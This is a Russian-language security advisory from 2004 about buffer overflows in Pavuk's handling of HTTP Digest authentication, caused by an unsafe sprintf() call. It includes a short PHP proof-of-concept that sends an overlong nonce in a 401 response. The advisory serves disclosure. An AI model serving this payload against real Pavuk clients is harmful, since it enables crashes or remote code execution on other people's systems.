Security Lab

Несколько переполнений буфера в Pavuk

Дата публикации:29.07.2004
Всего просмотров:1839
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Pavuk

Описание: Несколько переполнений буфера обнаружено в Pavuk в обработке ответов Digest аутентификации. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может послать специально обработанное HTTP 401 сообщение, которое включает Digest ответ с чрезмерно длинными значениями в некоторых полях, чтобы вызвать переполнение буфера. Уязвимость связана с небезопасным вызовом функции sprintf().

Пример/Эксплоит:

<?php
$buffer = "";
for ($i = 0; $i < 1024; $i++) {
$buffer .= "A";
}
header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\"
opaque=\"opaque\" nonce=\"$buffer\"");
header("Status: 401 Not Authorized");
?>

URL производителя: http://pavuk.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Уязвимость устранена для некоторых Linux дистрибутивов.

Ссылки: [Full-Disclosure] Pavuk Digest Authentication Buffer Overflow